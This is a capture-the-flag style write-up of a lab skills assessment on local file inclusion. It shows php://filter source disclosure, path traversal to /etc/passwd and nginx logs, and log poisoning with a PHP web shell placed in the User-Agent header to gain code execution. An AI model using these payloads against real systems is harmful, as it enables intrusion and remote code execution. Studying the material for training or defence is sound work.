Skills Assessment
Task
The company INLANEFREIGHT
has contracted you to perform a web application assessment against one of their public-facing websites. They have been through many assessments in the past but have added some new functionality in a hurry and are particularly concerned about file inclusion/path traversal vulnerabilities.
They provided a target IP address and no further information about their website. Perform a full assessment of the web application checking for file inclusion and path traversal vulnerabilities.
Find the vulnerabilities and submit a final flag using the skills we covered in the module sections to complete this module.
Don’t forget to think outside the box!
Assess the web application and use a variety of techniques to gain remote code execution and find a flag in the / root directory of the file system. Submit the contents of the flag as your answer.
Attempt
I found each page was accessed using the page
parameter: http://94.237.57.18:35112/index.php?page=contact
. This could be vulnerable to LFI.
Read index.php
http://94.237.57.18:35112/index.php?page=php://filter/convert.base64-encode/resource=index
Decoded base64 data in the source code and found this portion:
<?php
// echo '<li><a href="ilf_admin/index.php">Admin</a></li>';
?>
Looks like a hidden url.
Using the same method, accessed that page:
http://94.237.57.18:35112/index.php?page=php://filter/convert.base64-encode/resource=ilf_admin/index
Found parameters:
<li id="mtmi-menu" name="mtmi"><a href="index.php?log=http.log"><span>Service Log</span></a></li>
<li class="nav-header">Performance View</li>
<li id="monthinfo-menu" name="monthinfo"><a href="index.php?log=system.log"><span>System Log</span></a></li>
</ul>
And this classic LFI vulnerable code without sanitization or validation:
<?php
if(isset($_GET['log'])) {
$log = "logs/" . $_GET['log'];
echo "<pre>";
include $log;
echo "</pre>";
}
?>
Accessed this url:
http://94.237.57.18:35112/ilf_admin/index.php?log=../../../../../../../etc/passwd
Out of the result, I found this:
nginx:x:100:101:nginx:/var/lib/nginx:/sbin/nologin
The server must use nginx.
Turned on burp and accessed the acesss.log:
http://94.237.57.18:35112/ilf_admin/index.php?log=../../../../../../../var/log/nginx/access.log
Since the server log records a user agent header like this:
10.30.18.38 - - [11/Mar/2025:08:53:48 +0000] "GET /ilf_admin/js/bootstrap.js HTTP/1.1" 404 188 "http://94.237.57.18:35112/ilf_admin/index.php?log=../../../../../../../var/log/nginx/access.log" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36"
By sending a malicious user agent header, you can poison the log.
Let’s poison it by setting this simple payload to the User-Agent header:
<?php system($_GET['cmd']); ?>
A classic web shell you’ve seen more than your mum’s face.
Found the file flag_dacc60f2348d.txt
and inside it I found the flag.